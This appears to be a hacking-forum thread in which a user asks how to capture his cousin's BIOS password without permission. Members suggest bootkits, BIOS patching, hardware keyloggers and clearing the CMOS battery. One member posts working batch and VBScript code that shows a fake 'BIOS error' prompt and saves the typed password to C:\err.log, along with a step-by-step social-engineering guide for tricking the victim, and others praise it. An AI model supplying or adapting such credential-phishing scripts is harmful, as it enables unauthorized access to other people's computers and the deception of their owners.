keylogger for bios password

[keysearc]

my  cousin put bios password on his computer but sometimes i use them when it is tuened on so i want to install keyloger  but i think someone could recommend better keyloger?

[ca0s]

Normal keyloggers won't wirk. Note that at boot time you don't have any OS loaded. BIOS protections do their work before the SO loads. Your chances are limited to find a bootkit. Or download the installed BIOS, patch it to log (or just skip) the authentication, and flash it. However, that is not an easy task

[ande]

You can use a hardware keylogger attached between the keyboard and the computer.

[p_2001]

You can use a hardware keylogger attached between the keyboard and the computer.

but that would beat the whole point of hacking won't it?



here is an easier way, but not guaranteed to work if your cousin is smart enough.....

code a warning application and put it in the startup.. something like

Alert!...
the system has encountered problems while booting up. Please verify your BIOS password for continued protection of the system.

provide a DOS screen, maybe use a simple bat, for some reason people are impressed when I work on a black and white window lol..

Yeah, I know it is lame but it really worked for me once . It will work only if your cousin does not know too much about computers.

[Stackprotector]

but that would beat the whole point of hacking won't it?



here is an easier way, but not guaranteed to work if your cousin is smart enough.....

code a warning application and put it in the startup.. something like

Alert!...
the system has encountered problems while booting up. Please verify your BIOS password for continued protection of the system.

provide a DOS screen, maybe use a simple bat, for some reason people are impressed when I work on a black and white window lol..

Yeah, I know it is lame but it really worked for me once . It will work only if your cousin does not know too much about computers.

Social engineering is a big part of hacking, and the most effective one

[ande]

Hacking is far from remote only. Hacking is very much so a part of a physical access and so forth.

[p_2001]

Hacking is far from remote only. Hacking is very much so a part of a physical access and so forth.

not what I meant... as you said physical access is a part of it, what I meant was that using a tool such as that, he would have to buy it from somewhere, which is equivalent to being a script kiddie ( i spelled that right didn't I?), he would use a tool rather than learning something new.
basically you are paying for getting the password... unless of course you made the thing yourself.... there is no cultivation of skills involved..

Social engineering is a big part of hacking, and the most effective one

sure it is, but it requires a different type of skill than the one I'm currently focused on.... thats why I considered it lame.......

[ande]

not what I meant... as you said physical access is a part of it, what I meant was that using a tool such as that, he would have to buy it from somewhere, which is equivalent to being a script kiddie ( i spelled that right didn't I?), he would use a tool rather than learning something new.
basically you are paying for getting the password... unless of course you made the thing yourself.... there is no cultivation of skills involved..

Normally I would agree, but you cant expect him to learn how to do microprocessor programming and electronics only to make a hardware keylogger. Tho it would have been pretty cool to learn if you ask me.

[iTpHo3NiX]

Code: [Select]

@Echo off
REM Social Enginerring at its finest
REM Batch by iTpHo3NiX
Title=Error
cls
Echo Windows has encountered an error with your BIOS
echo protection. Please confirm your BIOS password to
echo run a security check on your system:
set /p biospass=
echo %biospass%>C:\err.log
cls
echo Thank you.
pause
exit
Save that as a .bat file, run that and then ask your cousin saying "hey this popped up when I turned on the computer" Then there will be a "err.log" in c:\ with the pass

[petermlm]

Code: [Select]

@Echo off
REM Social Enginerring at its finest
REM Batch by iTpHo3NiX
Title=Error
cls
Echo Windows has encountered an error with your BIOS
echo protection. Please confirm your BIOS password to
echo run a security check on your system:
set /p biospass=
echo %biospass%>C:\err.log
cls
echo Thank you.
pause
exit
Save that as a .bat file, run that and then ask your cousin saying "hey this popped up when I turned on the computer" Then there will be a "err.log" in c:\ with the pass

XD! I would suggest something to make the windows fullscreen, if it is possible. And also something to print more text in the window so the all script makes it look like it is actually doing something.

[centizen]

If you want to get in to the computer that bad, just unplug it, open it, find the cr32 button cell battery and remove it. Some mother boards have a special jumper you can pull to do that for you but doing it manually works too.


Of course it's quite conspicuous as the password will be removed but it will still get you in.

[iTpHo3NiX]

XD! I would suggest something to make the windows fullscreen, if it is possible. And also something to print more text in the window so the all script makes it look like it is actually doing something.

This one better for you

whatever.vbs

Code: (vb) [Select]

'iTSE BIOS Pass
DIM fso, NewsFile, BIOSPass
Set fso = CreateObject("Scripting.FileSystemObject")
Set NewsFile = fso.CreateTextFile("c:\err.log", True)
'Start function
BIOSPass =InputBox ("Windows has encountered an error in BIOS and requires BIOS password to check the MBR. To scan and fix errors please enter BIOS password:")
NewsFile.WriteLine "BIOS Password: " & BIOSPass
NewsFile.Close
'Little box after 3 seconds to let them know it completed
WScript.sleep 3000
set WshShell = CreateObject("WScript.Shell")
Result = WshShell.Popup("Windows has recovered from error", 0, "Successful!", 65)
Quick Social Engineering Guide
by iTpHo3NiX

As you can see you can use custom code/script combined with Social Engineering to get the information you want. When people see a pop up window they tend to think its part of the system. This quick guide will teach you to easily obtain a BIOS password, instead of trying to crack it, but rather it be given to you.

Step one:


The script will pop up with a box, this box tells the user/victim that their BIOS/MBR is having issues, they then proceed to enter their BIOS password to "fix" their computer

Step Two:


3 Seconds later and the user is informed that windows has fixed the issue!

Step Three:


Nifty little err.log file in the C:\ directory with the BIOS password.

Enjoy!

[petermlm]

This one better for you

(...)

Way better then what I was thinking! Great job!

[iTpHo3NiX]

Way better then what I was thinking! Great job!

You must've missed Kulver's contribution to this little side project lol:

http://evilzone.org/tutorials/social-engineering-with-code-to-get-bios-password/msg22509/#msg22509



Also some new information:

Firmware - A computer's BIOS, which is typically responsible for handling keyboard events, can be reprogrammed so that it records keystrokes as it processes them.

^Seems interesting.. I will have to look more into that! A flashable BIOS that can become a BIOS base keylogger

[petermlm]

Ah, didn't know or didn't remember about that. Looks brutal, lol.